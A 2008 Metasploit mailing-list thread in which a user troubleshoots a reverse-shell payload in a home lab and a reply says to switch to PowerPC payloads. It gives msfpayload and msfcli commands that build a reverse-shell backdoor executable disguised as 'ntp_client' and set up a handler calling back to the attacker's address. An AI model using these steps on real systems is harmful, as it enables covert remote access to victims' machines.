Metasploit mailing list archives
./msfpayload question > solved
From: tiberius01 at gmx.net (|0101|)
Date: Sat, 07 Jun 2008 12:53:23 +0200
Problem solved! Thanks for all replies. Tiberius -------- Original-Nachricht --------
Datum: Fri, 06 Jun 2008 21:36:12 -0400 Von: cg <lists at carnal0wnage.com> An: tiberius01 at gmx.net CC: framework at spool.metasploit.com Betreff: Re: [framework] ./msfpayload question
x86 is the wrong payload for a power pc, use the ppc payloads osx/ppc/shell/reverse_tcp -CG On Fri, 2008-06-06 at 13:26 +0200, tiberius01 at gmx.net wrote:Dear list, I was playing around with the ./msfpayload to test several reverseexecutable backdoors on windows, linux and osx.As example the windows/meterpreter/reverse_tcp was working brilliant onseveral windows versions,but it was not possible to get the osx/x86/shell_reverse_tcp payload upand running.My test Victim: macbook - 10.5.3 (firewall, little snitch > disabled) My test Attacker: powerbook(ppc) - 10.4.11 ((firewall, little snitch >disabled)I've already done the following steps: /attacker/ # ./msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.1.51 LPORT=123 X ntp_client # chmod +x ntp_client /victim/ # ./ntp_client /attacker/ # ./msfcli exploit/multi/handler PAYLOAD=osx/x86/shell_reverse_tcpLPORT=123 LHOST=192.168.1.51 EAfterwards no connection could be established - Does anyone have ansuggestion?Thanks in Advance, Tiberius
-- Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! Ideal f?r Modem und ISDN: http://www.gmx.net/de/go/smartsurfer
Current thread:
- ./msfpayload question tiberius01 at gmx.net (Jun 06)
- ./msfpayload question cg (Jun 06)
- ./msfpayload question > solved |0101| (Jun 07)
- ./msfpayload question cg (Jun 06)